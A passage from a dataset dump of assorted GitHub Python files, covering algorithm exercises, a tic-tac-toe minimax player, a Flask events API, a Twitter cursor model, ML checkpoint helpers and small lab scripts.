\"/tmp/timestamps.txt\"\n\n if check_cron_job_exists():\n print(\"The cron job is configured correctly.\")\n time.sleep(5)\n\n if check_file_content(file_path):\n print(\"The cron job is running and appending to the file.\")\n else:\n print(\"The cron job is running but not appending to the file in the correct format.\")\n sys.exit(1)\n else:\n print(\"The cron job is NOT configured correctly.\")\n sys.exit(1)\n\n","repo_name":"p0m3lO/labs","sub_path":"Basic/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"483166261","text":"class Solution:\n def reorderLogFiles(self, logs: list[str]) -> list[str]:\n letters = [log for log in logs if log.split()[1].isalpha()]\n digits = [log for log in logs if log.split()[1].isdigit()]\n \n letters.sort(key = lambda x : (x.split()[1:], x.split()[0]))\n return letters + digits\n\nsolution = Solution()\ninput1 = logs = [\"dig1 8 1 5 1\",\"let1 art can\",\"dig2 3 6\",\"let2 own kit dig\",\"let3 art zero\"]\nresult = solution.reorderLogFiles(input1)\nprint(f\"{result}\")","repo_name":"bkim1999/Python-Algorithm-Interview","sub_path":"String Manipulation/3. Reorder Data in Log Files.py","file_name":"3. Reorder Data in Log Files.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14793331512","text":"'''\nGiven an unsorted integer array, \nfind the smallest missing positive integer.\n'''\n\n\nclass Solution:\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.append(0)\n n = len(nums)\n for i in range(n):\n if nums[i] < 0 or nums[i] >= n:\n nums[i] = 0\n for i in range(n):\n nums[nums[i]%n] += n\n for i in range(1, n):\n if nums[i] // n == 0:\n return i\n return n","repo_name":"smileshy777/practice","sub_path":"array/hard/first_missing_positive.py","file_name":"first_missing_positive.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10253065941","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport copy\nimport math\nimport sys\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\nN = 3\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],]\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n countX = 0\n countO = 0\n for i in range(N):\n countX = countX + board[i].count(X)\n countO = countO + board[i].count(O)\n \n if ((countX == 0 and countO == 0) or countX == countO):\n return X\n elif (countX > countO):\n return O\n else:\n return X\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n for i in range(N):\n for j in range(N):\n if (board[i][j] is EMPTY):\n actions.add((i, j))\n return actions\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n (i, j) = action\n\n \n # invalid action\n if (i < 0 or j < 0 or i > N or j > N or board[i][j] is not EMPTY):\n raise ValueError((i, j))\n \n # resulting board\n resulting = copy.deepcopy(board)\n resulting[i][j] = player(board)\n return resulting\n \n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n # horizontal and vertical \n for i in range(N):\n if board[i].count(X) == N or [board[j][i] for j in range(N)].count(X) == N:\n return X\n elif board[i].count(O) == N or [board[j][i] for j in range(N)].count(O) == N:\n return O\n\n # diagonal\n if [board[i][i] for i in range(N)].count(X) == N:\n return X\n\n if [board[i][i] for i in range(N)].count(O) == N:\n return O\n \n if [board[i][N-i-1] for i in range(N)].count(X) == N:\n return X\n \n if [board[i][N-i-1] for i in range(N)].count(O) == N:\n return O\n\n return None\n \n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n # there is winner\n if winner(board) is not None:\n return True\n\n # game is running\n for i in range(N):\n for j in range(N):\n if (board[i][j] is EMPTY):\n return False\n\n return True\n\np\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n if winner(board) == X:\n return 1\n elif winner(board) == O:\n return -1\n return 0\n\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n if terminal(board): \n return None\n\n elif player(board) == X:\n val = -sys.maxsize - 1\n alpha = -sys.maxsize - 1\n beta = sys.maxsize\n\n for a in actions(board):\n alpha = minvalue(result(board, a), alpha, beta)\n if (alpha > val):\n val = alpha\n action = a\n return action\n \n elif player(board) == O:\n val = sys.maxsize\n alpha = -sys.maxsize - 1\n beta = sys.maxsize\n\n for a in actions(board):\n beta = maxvalue(result(board, a), alpha, beta)\n if (beta < val):\n val = beta\n action = a\n return action\n \n \ndef maxvalue(board, alpha, beta):\n if terminal(board):\n return utility(board)\n \n for action in actions(board):\n alpha = max(alpha, minvalue(result(board, action), alpha, beta))\n if (alpha >= beta):\n return beta\n \n return alpha\n\n\ndef minvalue(board, alpha, beta):\n if terminal(board):\n return utility(board)\n\n for a in actions(board):\n beta = min(beta, maxvalue(result(board, a), alpha, beta))\n if (beta <= alpha):\n return alpha\n \n return beta","repo_name":"quocthanhp/Tic-Tac-Toe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671114781","text":"from alembic import op\nimport sqlalchemy as sa\n\n\"\"\"increase tag elements from 60 to 255 chars\n\nRevision ID: 8df53b0d2c0e\nRevises: 6135a7bd4425\nCreate Date: 2021-03-29 14:44:35.607053\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '8df53b0d2c0e'\ndown_revision = '6135a7bd4425'\n\nTABLE = 'tags'\n\n\ndef upgrade():\n op.alter_column(TABLE, 'tag', existing_type=sa.String(60),\n type_=sa.String(255), existing_nullable=False)\n","repo_name":"openstack/neutron","sub_path":"neutron/db/migration/alembic_migrations/versions/xena/expand/8df53b0d2c0e_increase_tag_elements_from_60_to_255_.py","file_name":"8df53b0d2c0e_increase_tag_elements_from_60_to_255_.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"44046954895","text":"\nimport os\nimport os.path as osp\nimport shutil\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel\n\n\nclass BaseModel():\n\n @property\n def name(self):\n return 'BaseModel'\n\n def initialize(self, opt):\n self.opt = opt\n self.isTrain = opt.isTrain\n self.Tensor = torch.cuda.FloatTensor\n self.save_dir = osp.join(opt.checkpoints_dir)\n\n # helper saving function that can be used by subclasses\n def save_network(self, network, model_name, epoch, stage_id=None):\n if stage_id is None:\n save_filename = f\"{epoch}_net_{model_name}\"\n else:\n save_filename = f\"{epoch}_net_{model_name}_stage_{stage_id:02d}\"\n save_path = osp.join(self.save_dir, save_filename)\n if isinstance(network, nn.DataParallel) or isinstance(network, DistributedDataParallel):\n network = network.module\n state_dict = network.state_dict()\n for key, param in state_dict.items():\n state_dict[key] = param.cpu()\n torch.save(state_dict, save_path)\n\n def save_info(self, save_info, epoch, stage_id=None):\n if stage_id is None:\n save_filename = f'{epoch}_info.pth'\n else:\n save_filename = f'{epoch}_info_stage_{stage_id:02d}.pth'\n save_path = osp.join(self.save_dir, save_filename)\n torch.save(save_info, save_path)\n\n # helper loading function that can be used by subclasses\n def load_network(self, network, model_name, epoch, stage_id=None):\n if stage_id is None:\n save_filename = f\"{epoch}_net_{model_name}.pth\"\n else:\n save_filename = f\"{epoch}_net_{model_name}_stage_{stage_id:02d}.pth\"\n save_path = osp.join(self.save_dir, save_filename)\n if not osp.exists(save_path):\n print(f\"{save_path} does not exist !!!\")\n return False\n else:\n if self.opt.dist:\n network.module.load_state_dict(torch.load(\n save_path, map_location=lambda storage, loc: storage.cuda(torch.cuda.current_device())))\n else:\n saved_weights = torch.load(save_path)\n network.load_state_dict(saved_weights)\n return True\n\n def load_info(self, epoch):\n save_filename = '{}_info.pth'.format(epoch)\n save_path = osp.join(self.save_dir, save_filename)\n # saved_info = torch.load(save_path)\n if self.opt.dist:\n saved_info = torch.load(save_path, map_location=lambda storage, loc: storage.cuda(\n torch.cuda.current_device()))\n else:\n saved_info = torch.load(save_path)\n return saved_info","repo_name":"penincillin/IHMR","sub_path":"src/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"} +{"seq_id":"10108653468","text":"import random\ndef get_random_string(length: int) -> str:\n chars = list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123))\n\n result = \"\"\n for i in range(length):\n char_code = random.choice(chars)\n result += chr(char_code)\n\n return result\n","repo_name":"Videnin/Hillel_Videnin","sub_path":"HW_32.py","file_name":"HW_32.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70128472874","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/1/2 20:37\n# @Author : LeonHardt\n# @File : jieba_cut.py\n\n\nimport os\nimport glob\nimport codecs\n\n\nimport jieba\nimport jieba.analyse\n\n# -------------------------------------------\n# file direction set\n# load user_dict\n# -------------------------------------------\njieba.load_userdict('all_dict.txt')\n\n\n# ------------------------------------------\n# article cut\n\n\ndef file_cut(path, data_name):\n \"\"\"\n Parameters\n ----------\n path: str\n file path\n data_name:\n text name\n Returns\n -------\n None\n cut the passage and write\n \"\"\"\n source_file = path + '/' + data_name # data name\n source = codecs.open(source_file, 'r', encoding='utf-8')\n\n out_path = path + '/out_file/'\n if os.path.exists(out_path) is not True:\n os.makedirs(out_path)\n\n out_file = out_path + data_name\n if os.path.exists(out_file):\n os.remove(out_file)\n\n stop_dict = [] # stop dict\n with open('stop_words_dict.txt', 'r', encoding='utf-8') as dic:\n line = dic.readline()\n while line != \"\":\n line = line.rstrip('\\n')\n stop_dict.append(line)\n line = dic.readline()\n\n out = codecs.open(out_file, 'w', 'utf-8')\n line = source.readline()\n while line!=\"\":\n line = line.rstrip('\\n')\n line.replace('\\t', '').replace('\\n', '').replace(' ', '')\n seg_list = list(jieba.cut(line, cut_all=False)) # cut the passage\n for word in seg_list:\n if word in stop_dict:\n seg_list.remove(word)\n output = ' '.join(seg_list)\n print(output)\n out.write(output)\n line = source.readline()\n print('END ALL')\n\n# ----------------------------------------------------\n# main\n\n\nif __name__ == '__main__':\n file_path = os.getcwd() + '/lib/text_data/my_use/'\n file_list = glob.iglob(file_path + '*.txt')\n for file in file_list:\n file_name = file.split('\\\\')[-1]\n file_cut(file_path, file_name)\n\n # file_cut(file_path, '我杀了他.txt')","repo_name":"LeonHardt427/mining_Higashino","sub_path":"jieba_cut.py","file_name":"jieba_cut.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17634261850","text":"import os\nfrom typing import Optional, Any\n\nfrom algo_ops.ops.op import Op\nfrom algo_ops.pipeline.pipeline import Pipeline\nfrom ocr_ops.framework.op.abstract_ocr_op import EasyOCROp\nfrom ocr_ops.framework.op.ffmpeg_op import FFMPEGOp\nfrom ocr_ops.framework.pipeline.ocr_pipeline import OCRMethod\nfrom ocr_ops.instances import ocr\n\nfrom card_recognizer.api.operating_mode import OperatingMode\nfrom card_recognizer.classifier.core.word_classifier import WordClassifier\nfrom card_recognizer.pulls_estimator.pulls_estimator import PullsEstimator\nfrom card_recognizer.pulls_estimator.pulls_summary import PullsSummary\nfrom card_recognizer.reference.core.build import ReferenceBuild\n\n\nclass CardRecognizer(Pipeline):\n def __init__(\n self,\n set_name: Optional[str] = \"master\",\n classification_method: str = \"shared_words\",\n mode: OperatingMode = OperatingMode.SINGLE_IMAGE,\n min_run_length: Optional[int] = 5,\n min_run_conf: Optional[float] = 0.1,\n run_tol: Optional[int] = 10,\n ):\n # load classifier\n ref_pkl_path = ReferenceBuild.get_set_pkl_path(set_name=set_name)\n self.classifier = WordClassifier(\n ref_pkl_path=ref_pkl_path,\n vect_method=\"encapsulation_match\",\n classification_method=classification_method,\n )\n\n # load OCR pipeline\n if mode in [\n OperatingMode.IMAGE_DIR,\n OperatingMode.VIDEO,\n OperatingMode.PULLS_IMAGE_DIR,\n OperatingMode.PULLS_VIDEO,\n OperatingMode.BOOSTER_PULLS_IMAGE_DIR,\n OperatingMode.BOOSTER_PULLS_VIDEO,\n ]:\n store_intermediate_images = False\n else:\n store_intermediate_images = True\n self.ocr_pipeline = ocr.basic_ocr_with_text_cleaning_pipeline(\n vocab_words=self.classifier.reference.vocab(),\n ocr_method=OCRMethod.EASYOCR,\n store_intermediate_images=store_intermediate_images,\n )\n\n # make pipeline\n if mode == OperatingMode.VIDEO:\n ops = [FFMPEGOp(), self.ocr_pipeline, self.classifier]\n elif mode == OperatingMode.SINGLE_IMAGE:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n ]\n elif mode == OperatingMode.IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n ]\n elif mode == OperatingMode.PULLS_IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n num_cards_to_select=None,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.PULLS_VIDEO:\n ops = [\n FFMPEGOp(),\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n num_cards_to_select=None,\n figs_paging=True,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.BOOSTER_PULLS_IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.BOOSTER_PULLS_VIDEO:\n ops = [\n FFMPEGOp(),\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n ),\n PullsSummary(operating_mode=mode),\n ]\n else:\n raise ValueError(\"Unsupported mode: \" + str(mode))\n super().__init__(ops=ops)\n\n def find_op_by_class(self, op_class: Any) -> Optional[Op]:\n for op in self.ops.values():\n if isinstance(op, op_class):\n return op\n return None\n\n def set_output_path(self, output_path: Optional[str] = None):\n \"\"\"\n Set output path for results.\n \"\"\"\n ffmpeg_op = self.find_op_by_class(op_class=FFMPEGOp)\n if ffmpeg_op is not None:\n ffmpeg_op.image_out_path = os.path.join(\n output_path, \"uncompressed_video_frames\"\n )\n pulls_estimator_op = self.find_op_by_class(op_class=PullsEstimator)\n if pulls_estimator_op is not None:\n pulls_estimator_op.output_fig_path = output_path\n autosave_path = os.path.join(output_path, \"ocr_bounding_boxes\")\n self.ocr_pipeline.ocr_op.autosave_output_img_path = autosave_path\n\n def set_summary_file(self, summary_file: str):\n \"\"\"\n Set summary file.\n \"\"\"\n pulls_summary_op = self.find_op_by_class(op_class=PullsSummary)\n if pulls_summary_op is None:\n raise ValueError(\"There is no pulls summary op found in this pipeline.\")\n if pulls_summary_op is not None:\n pulls_summary_op.summary_file = summary_file\n\n def to_pickle(self, out_pkl_path: str) -> None:\n # temporarily remove un-pickleable elements\n easy_ocr_instance = None\n if isinstance(self.ocr_pipeline.ocr_op, EasyOCROp):\n easy_ocr_instance = self.ocr_pipeline.ocr_op.easy_ocr_reader\n self.ocr_pipeline.ocr_op.easy_ocr_reader = None\n\n # super call to pickle\n super().to_pickle(out_pkl_path=out_pkl_path)\n\n # restore state\n if isinstance(self.ocr_pipeline.ocr_op, EasyOCROp):\n self.ocr_pipeline.ocr_op.easy_ocr_reader = easy_ocr_instance\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/api/card_recognizer.py","file_name":"card_recognizer.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40797303088","text":"from bot.app.controllers.logger import *\nimport bot.app.config as config\nfrom datetime import datetime, timedelta, timezone\nfrom google.cloud import datastore\nimport json\n\n# Start logger\nlogger = logging.getLogger(__name__)\n\n\n# Define a model class to store data in Google Cloud Firestore (using Datastore compatibility)\nclass TwitterCursor(object):\n \"\"\"\n This class creates an object that stores ID number of the last tweet retrieved from Twitter servers, as well as the\n date and time it was last modified. Its methods not only allow you to get, set, and update its data in the database,\n but also to import/export as a dictionary, export as JSON, as well as checking if the data is recent enough or you\n should reload it from the database.\n \"\"\"\n\n def __init__(self, last_id=1):\n \"\"\"\n This method initialises an instance by storing a tweet ID number and recording the date and time of its\n creation. The ID number can be either provided at creation time or it will default to 1 (int) as it would be\n the case if your bot has just been activated in a new account. In case that you enable this bot in an already\n existent account you should visit the URL that only checks mentions to make sure of overwrite the default value\n with the actual last tweet ID number!\n\n :param last_id: The tweet ID number that should be set as a cursor for future request to the Twitter API\n :type last_id: int\n \"\"\"\n\n # Log informational message\n logger.info(msg='Started a new TwitterCursor instance')\n\n # Start the datastore client instance\n self.db_client = datastore.Client()\n\n # Log informational message\n logger.info(msg='Started a new datastore client instance')\n\n # Set a single default entity key so that the entity is always assigned the same record (number 1) in datastore\n # because there's no need to store this datum more than once\n self.entity_key = self.db_client.key('tw_cursor_last_id', 1)\n\n # Check first if there's any cursor data recorded in the datastore, in case that the bot is restarting\n db_data = self.get_from_db()\n\n # If data is absent from datastore, then set default values because this is the first time the bot has ran\n if db_data is None:\n self.last_id = last_id\n self.creation_time = datetime.now(tz=timezone.utc)\n else:\n # Otherwise, set the cursor using the data from the datastore\n self.last_id = db_data['last_id']\n self.creation_time = db_data['creation_time']\n\n def get(self, obj_property):\n \"\"\"\n This method gets the current instance data and returns the requested property.\n\n :param obj_property: The specific property that should be returned\n :type obj_property: str or int\n :return: The current data for that cursor property\n :rtype: str or int\n \"\"\"\n\n # Map the cursor properties to possible parameter names to ensure returning the correct one\n obj_map = {'last_id': self.last_id, 'creation_time': self.creation_time}\n\n # Return requested datum\n return obj_map[obj_property]\n\n def set(self, obj_property, value):\n \"\"\"\n This method sets the provided value for the requested property in the current instance.\n\n :param obj_property: The cursor property whose value should be overwritten\n :type obj_property: str\n :param value: The new value that should overwrite the current data for a given property\n :type value: int or datetime\n :return: An informational message stating success or False\n :rtype: str or bool\n \"\"\"\n\n # Log debugging information\n logger.debug(msg='Cursor set method received this for value: {0}'.format(value))\n logger.debug(msg='Cursor set method received this for type(value): {0}'.format(type(value)))\n\n # Set new value into property and exit\n if setattr(self, obj_property, value):\n return 'OK'\n else:\n return False\n\n def to_dict(self):\n \"\"\"\n Get the current cursor data and return it as a dictionary.\n\n :return: Cursor data as a dictionary\n :rtype: dict\n \"\"\"\n\n # Return data\n return {'creation_time': self.creation_time, 'last_id': self.last_id}\n\n def from_dict(self, dict_data):\n \"\"\"\n Import data from a dictionary and overwrite current values for any property.\n\n :param dict_data: Dictionary containing cursor data\n :type dict_data: dict[str or int]\n :return: True\n :rtype: bool\n \"\"\"\n\n # Iterate over the dictionary data and set new values\n for item in dict_data:\n setattr(self, item, dict_data[item])\n\n # Return success signal\n return True\n\n def to_json(self, indented=True):\n \"\"\"\n This method gets the current cursor data and return it in JSON format.\n\n :param indented: Whether the JSON data returned should be indented for pretty-printing\n :type indented: bool\n :return: Current cursor data in JSON format\n :rtype: str\n \"\"\"\n\n # Convert the cursor properties to a dictionary and set values as data types that can be exported in JSON format\n structure = {'creation_time': self.creation_time.isoformat(), 'last_id': self.last_id}\n\n # Check whether data should be indented or not and return it\n if indented:\n return json.dumps(structure, indent=4, sort_keys=True)\n else:\n return json.dumps(structure, sort_keys=True)\n\n def from_json(self, json_data):\n \"\"\"\n This method imports data provided in JSON format and overwrites current values for any cursor property.\n\n :param json_data: Cursor data provided in JSON format\n :type json_data: str\n :return: An informational message\n :rtype: str\n \"\"\"\n\n # Load JSON data ina temporary variable\n cursor_data = json.loads(json_data)\n\n # Overwrite current property values with new ones, converting them to an appropriate format if necessary\n self.last_id = cursor_data.last_id\n self.creation_time = datetime.fromisoformat(date_string=cursor_data.creation_time)\n\n # Return informational message\n return 'json data imported'\n\n def send_to_db(self):\n \"\"\"\n Store current cursor data into the database and return a copy of it.\n\n :return: A copy of the current cursor data that was sent to database\n \"\"\"\n\n # Create a new datastore entity\n data_item = datastore.Entity(key=self.entity_key)\n\n # Get current cursor data\n cursor_data = self.to_dict()\n\n # Log debugging messages\n logger.debug(msg='data_item entity is: {0}'.format(data_item))\n logger.debug(msg='cursor_data is: {0}'.format(cursor_data))\n logger.debug(msg='type(cursor_data) is: {0}'.format(type(cursor_data)))\n\n # Populate datastore entity with current cursor data\n data_item.update(cursor_data)\n\n # Store datastore entity in the database\n self.db_client.put(entity=data_item)\n\n # Return a copy of current cursor data\n return {'item_id': str(data_item.id), 'cursor_data': cursor_data}\n\n def get_from_db(self):\n \"\"\"\n Retrieve cursor data directly from the datastore and return it.\n\n :return: Cursor data as it is stored in the database\n :rtype: dict\n \"\"\"\n\n # Get cursor data from the database\n db_data = self.db_client.get(key=self.entity_key)\n\n # Log debugging information\n logger.debug(msg='Retrieved cursor data from db: {0}'.format(repr(db_data)))\n\n # Return cursor data\n return db_data\n\n def update_from_db(self):\n \"\"\"\n This method retrieves the cursor data stored in the database and update current cursor values with those in\n the database.\n\n :return: If database is not empty, return cursor data. Otherwise return None\n :rtype: dict or None\n \"\"\"\n db_data = self.db_client.get(key=self.entity_key)\n logger.info(msg='Retrieved cursor data from db: {0}'.format(repr(db_data)))\n\n if db_data is not None:\n self.from_dict(dict_data=db_data)\n\n return {'last_id': self.last_id, 'creation_time': self.creation_time}\n else:\n return None\n\n def is_it_recent(self):\n \"\"\"\n This method checks whether the current values of the cursor instance are reasonably recent (i.e. less than\n twice the twitter_interval setting in the config.py module). If it's not, you should get the cursor data from\n the database in case another instance from your app in GAE has been active as well. Otherwise, you may end up\n replying twice to the same tweet mention.\n\n :return: Confirmation of whether this cursor instance holds recent data or not\n :rtype: bool\n \"\"\"\n\n # Get current date and time from the operating system\n now = datetime.now(tz=timezone.utc)\n\n # Calculate the date and time difference between now and the data stored in the cursor\n delta = now - self.creation_time\n\n # Calculate if the magnitude of the difference exceeds the threshold\n interval = timedelta(minutes=2 * config.twitter_interval)\n\n # Make a decision and return it\n if delta > interval:\n return False\n else:\n return True\n","repo_name":"tiktaalik-dev/Event-Info-Bot","sub_path":"bot/app/models/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":9573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45173142407","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import setup_db, Location, Event\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n \n @app.route('/')\n def get_greeting():\n # excited = os.environ['EXCITED']\n greeting = \"Hello !!!\" \n return greeting\n\n @app.route('/locations', methods=['GET'])\n @requires_auth('get:locations')\n def locations(jwt):\n locations = Location.query.order_by(Location.id).all()\n data = []\n for location in locations:\n data.append({\n \"id\": location.id,\n \"name\": location.name,\n \"location\": location.location\n })\n\n if len(locations) == 0:\n abort(404)\n else:\n format_locations = [location.format() for location in locations]\n\n return jsonify({\n 'success': True,\n 'locations': format_locations, \n 'total_locations': len(format_locations),\n })\n\n @app.route('/locations', methods=['POST'])\n @requires_auth('post:locations')\n def add_location(jwt):\n body = request.get_json()\n new_name = body.get('name', None)\n new_location = body.get('location', None)\n\n try:\n location = Location(name=new_name, location=new_location)\n print(location)\n location.insert()\n\n return jsonify({\n 'success': True,\n })\n except Exception as e: \n print(e)\n\n @app.route('/events', methods=['GET'])\n @requires_auth('get:events')\n def events(jwt):\n events = Event.query.order_by(Event.id).all()\n data = []\n for event in events:\n data.append({\n \"id\": event.id,\n \"name\": event.name,\n \"location\": event.location\n })\n\n if len(events) == 0:\n abort(404)\n else:\n formatted_events = [event.format() for event in events]\n return jsonify({\n 'success': True,\n 'events': formatted_events,\n 'data': data,\n 'total_events': len(formatted_events),\n })\n \n @app.route('/events', methods=['POST'])\n @requires_auth('post:events')\n def add_event(jwt):\n body = request.get_json()\n new_name = body.get('name', None)\n new_location = body.get('location', None)\n\n try:\n event = Event(name=new_name, location=new_location)\n print(event)\n event.insert()\n\n return jsonify({\n 'success': True,\n })\n except Exception as e: \n print(e)\n\n\n @app.route('/events/', methods=['PATCH'])\n @requires_auth('patch:events')\n def update_event(jwt, id):\n try:\n event = Event.query.filter(Event.id == id).one_or_none()\n\n if event is None:\n abort(404)\n \n new_name = request.json.get(\"name\")\n new_location = request.json.get(\"location\")\n event.name = new_name\n event.location = new_location\n event.update()\n events = Event.query.order_by(Event.id).all()\n events_formatted = [event.format() for event in events]\n\n return jsonify({\n \"success\": True,\n \"events\": events_formatted\n }), 200\n except Exception as e: \n print(e)\n\n @app.route('/events/', methods=['DELETE'])\n @requires_auth('delete:events')\n def delete_event(jwt, id):\n try:\n event = Event.query.filter(Event.id == id).one_or_none()\n\n if event is None:\n abort(404)\n\n event.delete()\n\n return jsonify({\n 'success': True,\n 'delete': id\n }), 200\n except:\n abort(422)\n \n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 404,\n \"message\": \"Resource not found!\"\n }), 404\n\n @app.errorhandler(422)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 422,\n \"message\": \"Unprocessable!\"\n }), 422\n\n @app.errorhandler(400)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 400,\n \"message\": \"Bad request!\"\n }), 400\n\n @app.errorhandler(405)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 405,\n \"message\": \"Method not allowed!\"\n }), 405\n\n @app.errorhandler(AuthError)\n def auth_error(e):\n print(e)\n return jsonify({\n \"success\": False,\n \"error\": e.status_code,\n \"message\": e.error\n }), e.status_code\n\n return app\n\napp = create_app()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n ","repo_name":"Leny73/fsnd","sub_path":"projects/capstone/starter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291265236","text":"f = open(\"/home/student/PycharmProjects/Vex1cK's/4353.txt\")\na = []\nmk = 0\nk = 0\nfor s in f:\n a.append(int(s))\nfor i in range(len(a)-1):\n if str(a[i])[-1] == \"5\":\n if str(a[i+1])[-1] == \"5\":\n k+=1\n mk = max(mk,a[i]+a[i+1])\nprint(k,mk)\n\n\n","repo_name":"olgaObnosova/EGE","sub_path":"№17/4353.py","file_name":"4353.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35545731934","text":"__author__ = \"Kyle Vitautas Lopin\"\n\n# standard libraries\nimport filecmp\nimport os\nimport unittest\nfrom unittest import mock\n\n# local files\nimport amp_frame\nimport graph_properties\nimport properties\n\nFILE_DIR = os.path.dirname(os.path.realpath(__file__))\nSOLN_FILE = os.path.join(FILE_DIR, 'test1_soln.csv')\nSAVED_FILE = os.path.join(FILE_DIR, 'test.csv')\n\n\nclass TestAmpFrame(unittest.TestCase):\n @classmethod\n @mock.patch(\"amp_frame.AmpFrame.make_graph_area\")\n def setUpClass(cls, mocked_graph) -> None:\n cls.mocked_root = mock.Mock()\n cls.mocked_root.frames = [mock.Mock(), mock.Mock()]\n cls.mocked_root.device_params = properties.DeviceParameters()\n print(dir(cls.mocked_root))\n graph_props = graph_properties.GraphProps()\n cls.amp_frame = amp_frame.AmpFrame(cls.mocked_root, None, graph_props)\n\n @classmethod\n def tearDownClass(cls) -> None:\n if os.path.exists(SAVED_FILE):\n os.remove(SAVED_FILE)\n\n def test_save_data(self):\n device = mock.Mock()\n device.time = [1, 2, 3]\n device.data = [11, 12, 13]\n with mock.patch('amp_frame.open_file') as mock_open:\n mock_open.return_value = SAVED_FILE\n self.amp_frame.save_data(device)\n self.assertTrue(filecmp.cmp(SAVED_FILE, SOLN_FILE))\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"tests/unit_tests/test_amp_frame.py","file_name":"test_amp_frame.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"15217321236","text":"# encoding: utf-8\nfrom django.db import models\nfrom google.cloud import bigquery\nimport os\nimport json\nimport csv\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nMEDIA_ROOT = \"django-jquery-file-upload/media\"\n\nclass Picture(models.Model):\n \"\"\"This is a small demo using just two fields. The slug field is really not\n necessary, but makes the code simpler. ImageField depends on PIL or\n pillow (where Pillow is easily installable in a virtualenv. If you have\n problems installing pillow, use a more 